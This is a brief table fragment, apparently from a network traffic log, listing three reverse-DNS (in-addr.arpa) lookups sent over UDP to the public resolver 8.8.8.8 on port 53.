| US | 8.8.8.8:53 | 70.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |